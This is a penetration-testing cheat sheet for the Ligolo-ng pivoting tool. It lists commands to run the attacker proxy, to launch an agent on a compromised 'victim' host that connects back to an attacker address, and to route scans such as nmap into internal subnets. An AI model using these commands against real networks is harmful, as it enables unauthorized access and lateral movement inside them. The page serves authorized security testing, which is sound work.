CyberCheatsheets

Ligolo-ng Cheat Sheet

Advanced pivoting via TUN interface and agent — cleaner routing than SOCKS for multi-host internal scans.

Exploitation & PayloadspivottuntunnelUpdated 2026-06-02

Overview

Ligolo-ng creates a userspace network tunnel between an agent on a compromised host and a proxy on the attacker machine. Internal IPs become directly reachable (no proxychains per tool) after adding routes.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

Releases

wget https://github.com/nicocha30/ligolo-ng/releases/latest/download/ligolo-ng_proxy_linux_amd64.tar.gz
tar -xzf ligolo-ng_proxy_linux_amd64.tar.gz

Agent + proxy binaries: proxy (attacker), agent (victim)

chmod +x proxy agent

Essential commands

Attacker — start proxy

sudo ./proxy -selfcert

In ligolo console after agent connects

session

select agent

start

Add route to internal subnet (on attacker, outside ligolo)

sudo ip route add 172.16.1.0/24 dev ligolo

Common workflows

Terminal 1 — attacker

sudo ./proxy -selfcert -laddr 0.0.0.0:11601

Victim

./agent -connect 10.10.14.5:11601 -ignore-cert

In proxy TUI

ligolo-ng » session
? Specify a session : 1 - user@target - 192.168.1.50:44321
[Agent : user@target] » start

Attacker host routing

sudo ip route add 172.16.0.0/16 dev ligolo
nmap -sn 172.16.1.0/24

List and switch sessions in proxy UI

session

Agent connects out (default, firewall-friendly)

./agent -connect attacker:11601 -ignore-cert

Bind mode when inbound allowed

./proxy -listen 0.0.0.0:11601

Cleanup routes —

sudo ip route del 172.16.0.0/16 dev ligolo

Flags: ligolo-ng proxy

-selfcert

Generate self-signed TLS cert for agent

-laddr 0.0.0.0:11601

Listen address for agent connections

-listen 0.0.0.0:11601

Bind mode (agent connects in)

Flags: ligolo-ng agent

-connect 10.10.14.5:11601

Connect to proxy (reverse)

-ignore-cert

Ignore TLS certificate errors

-retry

Reconnect on disconnect

Commands: ligolo-ng console

List / select connected agent

session

Start tunnel for selected session

start

Stop tunnel

stop

Show tunnel interface info

ifconfig

Tips

  • Requires sudo on attacker for TUN and routing.
  • Disable conflicting VPN routes; check ip route before adding internal ranges.
  • Prefer ligolo over SOCKS when running many tools (bloodhound, kerbrute) without proxychains.
  • Old ligolo (Python) differs from ligolo-ng — use ng for current engagements.

References

Related cheat sheets